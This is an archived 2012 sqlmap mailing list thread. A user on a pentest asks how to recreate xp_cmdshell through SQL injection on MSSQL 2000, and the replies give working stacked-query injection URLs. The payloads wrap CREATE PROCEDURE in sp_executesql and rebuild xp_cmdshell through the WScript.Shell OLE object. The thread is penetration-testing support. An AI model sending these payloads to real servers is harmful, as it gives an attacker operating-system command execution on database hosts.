Re: [sqlmap-users] re-create xp_cmdshell
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] re-create xp_cmdshell
|
From: Miroslav S. <mir...@gm...> - 2012-06-18 10:38:26
|
My bad. I've thought that the problem is trivial :) This is the right way how to do it: http://www.target.com/vuln.asp?id=1;DECLARE @abc nvarchar(999); SET @abc='CREATE PROCEDURE xp_cmdshell(@cmd varchar(255)) AS DECLARE @ID int EXEC sp_OACreate ''WScript.Shell'', @ID OUT EXEC sp_OAMethod @ID, ''Run'', Null, @cmd, 0, 1 EXEC sp_OADestroy @ID'; EXEC master..sp_executesql @abc;-- (https://svn.sqlmap.org/sqlmap/trunk/sqlmap/lib/takeover/xp_cmdshell.py) That way you are bypassing that "syntax" obstacle by using a stored procedure master..sp_executesql to do it for you Kind regards, Miroslav Stampar On Mon, Jun 18, 2012 at 11:24 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi Adi. > > This means that CREATE PROCEDURE has to be used right after the semi-colon > (;) sign. > > So, if you have a SELECT SQLi case like: > SELECT * FROM users WHERE id=$_GET['id'] > > you would need to inject into it something like: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE.. > > As you are probably using "recreate steps" from > https://www.owasp.org/index.php/Testing_for_SQL_Server, this would mean > that you would need to inject: > http://www.target.com/vuln.asp?id=1;CREATE PROCEDURE xp_cmdshell(@cmd > varchar(255), @Wait int = 0) AS%0aDECLARE @result int, @OLEResult int, > @RunResult int%0a.... > > Kind regards, > Miroslav Stampar > > On Mon, Jun 18, 2012 at 10:59 AM, Adi Mutu <adi...@ya...> wrote: > >> >> Hello, >> >> I have a mssql 2000 sql injection in a pentest, i try to recreate >> xp_cmdshell and i get this: >> >> 'CREATE PROCEDURE' must be the first statement in a query batch. >> >> Anybody has any idea about this behavious and if it can be done something >> about this? >> >> Thanks >> >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
